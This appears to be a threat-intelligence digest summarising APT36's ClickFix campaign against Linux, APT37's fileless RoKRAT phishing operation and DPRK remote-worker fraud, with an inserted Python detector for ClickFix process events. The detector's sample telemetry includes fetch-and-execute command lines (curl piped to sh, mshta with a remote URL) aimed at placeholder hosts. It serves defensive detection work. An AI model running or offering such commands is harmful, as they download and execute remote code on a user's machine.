Update: APT36 Adapts ClickFix Attacks to Target Linux Systems in New Campaign
ClickFix, a social engineering tactic we’ve previously covered in trending topics, has now been observed in a new campaign by APT36 (Transparent Tribe), a threat group linked to Pakistan. Traditionally used to target Windows systems through fake application errors or verification prompts, ClickFix tricks users into pasting and executing malicious console commands. This recent campaign expands the attack surface by targeting both Windows and Linux platforms, marking one of the first known uses of ClickFix against Linux users. Victims are lured through a fake Indian Ministry of Defence website, which profiles the operating system and serves platform-specific instructions. Windows users are prompted to run a malicious MSHTA command that deploys a .NET-based loader while displaying a decoy document. For Linux users, the campaign presents a CAPTCHA page that instructs targets to run a shell command through the ALT+F2 run dialog. The command fetches a benign JPEG image, suggesting APT36 may be testing the infection chain before deploying actual malware. No persistence or outbound activity has been observed, but the delivery method is sound and could easily be weaponized with a simple payload swap. This evolution of ClickFix shows how adaptable and persistent this tactic has become, and it has now proven effective across all major desktop operating systems. It’s another reminder that users should avoid executing copied commands unless they fully understand their purpose. Security teams should remain alert to these low-tech, high-trust attacks that continue slipping through traditional controls.
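As an added illustration (not code from the original report or from any vendor named above), the following Python triages constructed process-creation events for the two ClickFix execution paths described here: mshta launched with a remote URL on Windows, and a shell one-liner that fetches and executes remote content from a desktop run dialog on Linux. The event fields, the parent-process names assumed for the run dialogs, and the sample command lines are all assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcEvent:
    host_os: str   # "windows" or "linux"
    parent: str    # parent process image name
    image: str     # process image name
    cmdline: str   # full command line as recorded by the EDR/auditd sensor


# Windows ClickFix path: mshta.exe handed a remote http(s) URL instead of a local HTA.
REMOTE_URL = re.compile(r"https?://", re.I)
# Linux ClickFix path: curl/wget output piped into a shell, or substituted with $(...) / backticks.
FETCH_AND_RUN = re.compile(
    r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b"   # curl ... | sh
    r"|\$\(\s*(?:curl|wget)\b"                                        # $(curl ...)
    r"|`\s*(?:curl|wget)\b",                                          # `curl ...`
    re.I,
)
SHELLS = {"sh", "bash", "zsh", "dash"}
# Assumed parents of a user-typed command: the Win+R dialog is spawned by explorer.exe;
# ALT+F2 on common Linux desktops is served by the shell/launcher processes below.
RUN_DIALOG_PARENTS = {"explorer.exe", "gnome-shell", "krunner", "plasmashell", "xfce4-appfinder"}


def classify(ev: ProcEvent) -> Optional[str]:
    """Return a detection label for one event, or None if nothing matched."""
    image, parent = ev.image.lower(), ev.parent.lower()
    if ev.host_os == "windows" and image == "mshta.exe" and REMOTE_URL.search(ev.cmdline):
        return "clickfix-windows-mshta-remote"
    if ev.host_os == "linux" and image in SHELLS and FETCH_AND_RUN.search(ev.cmdline):
        # Require a run-dialog parent so scripted curl|sh from build tooling does not fire.
        if parent in RUN_DIALOG_PARENTS:
            return "clickfix-linux-run-dialog-fetch-exec"
    return None


def triage(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (index, label) for every event that matched a rule."""
    return [(i, lab) for i, ev in enumerate(events) if (lab := classify(ev))]


# Constructed sample telemetry; the hosts and URLs are placeholders, not campaign indicators.
SAMPLE = [
    ProcEvent("windows", "explorer.exe", "mshta.exe", "mshta.exe http://example.invalid/verify.hta"),
    ProcEvent("windows", "explorer.exe", "mshta.exe", r"mshta.exe C:\Windows\Temp\local.hta"),
    ProcEvent("linux", "gnome-shell", "sh", 'sh -c "curl -s http://example.invalid/i.jpg | sh"'),
    ProcEvent("linux", "bash", "bash", 'bash -c "curl -s https://example.invalid/setup.sh | sh"'),
    ProcEvent("linux", "gnome-shell", "sh", 'sh -c "wget -qO- https://example.invalid/check"'),
]

if __name__ == "__main__":
    for i, label in triage(SAMPLE):
        print(i, label, SAMPLE[i].cmdline)
```

Only the two run-dialog-originated download-and-execute events are flagged; the local HTA, the scripted curl pipeline with a shell parent, and the plain wget fetch are left alone.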
APT37 Launches “Operation: ToyBox Story” Targeting North Korea-Focused Activists with Fileless Malware
In March 2025, North Korea-linked threat group APT37 launched a targeted spear phishing campaign against activists and analysts focused on North Korean issues. The operation, dubbed “ToyBox Story” by Genians Security Center, involved highly tailored phishing emails masquerading as invitations from a South Korean national security think tank. These emails included references to current geopolitical topics, like “Trump 2.0 Era” and “North Korean Troops Deployed to Russia,” to increase credibility. Embedded Dropbox links led recipients to compressed archives containing shortcut (LNK) files that executed PowerShell-based, fileless malware without dropping traditional executable payloads. This tactic, aligned with the “Living off Trusted Sites” (LoTS) model, abuses legitimate cloud services for command and control, making malicious activity difficult to detect in enterprise environments. The infection process uses PowerShell to stage multiple components in memory, including the RoKRAT malware, a tool previously used by APT37 that has been subtly updated to avoid detection. The script evades pattern-based antivirus detection by manipulating file extensions and executing payloads in memory, leaving little forensic evidence. RoKRAT collects screenshots and system info and exfiltrates data using Dropbox APIs authenticated with stolen OAuth tokens tied to Russian Yandex accounts. Communications are obfuscated with XOR and AES-CBC-128 encryption, showing a high degree of operational security. Security teams are advised to implement behavior-based detection and EDR anomaly hunting, as traditional tools will likely miss this level of stealth. The campaign reinforces concerns about APT37’s ongoing intelligence-gathering efforts and their effective use of cloud infrastructure to blend malicious activity into legitimate workflows.
Update: DPRK Remote Work Fraud Evolves, Indictments Reveal New Tactics and Global Infrastructure
We’ve previously reported on North Korea’s use of remote work fraud to infiltrate U.S. organizations, but recent indictments of 14 DPRK nationals show a significant escalation in both scale and sophistication. Over the past six years, this operation has funneled at least $88 million into the DPRK by embedding operatives into U.S. companies and nonprofits using stolen identities. Flashpoint’s new investigation reveals how fake companies, information-stealing malware, and remote access tools like AnyDesk were used to apply for and maintain access to IT roles across the tech, finance, and crypto sectors. Fake domains such as Baby Box Info, Helix US, and Cubix Tech US were tied to fabricated resumes and fraudulent references, while saved HR platform credentials and browser autofill data pointed to compromised hosts in locations like Pakistan. This campaign goes beyond traditional fraud, using elaborate setups like “laptop farms” in Nigeria and Dubai, where DPRK actors remotely access company-issued hardware. Tactics included spoofed employment verification emails, manipulation of voice recordings to avoid video interviews, and instructions for smuggling devices through customs. Flashpoint uncovered translation activity between English and Korean, suggesting real-time coordination between Korean handlers and foreign collaborators. While many indicators pointed to Pakistan and other regions, Korean language settings, Chinese time zones, and use of Astrill VPNs with U.S. IPs are all signatures associated with North Korean threat activity. This evolution demonstrates a more distributed, proxy-based approach, raising the bar for detection. Organizations are urged to implement stronger identity verification, monitor for unauthorized remote access tools, and conduct deeper background checks to avoid becoming the next target in this expanding threat landscape.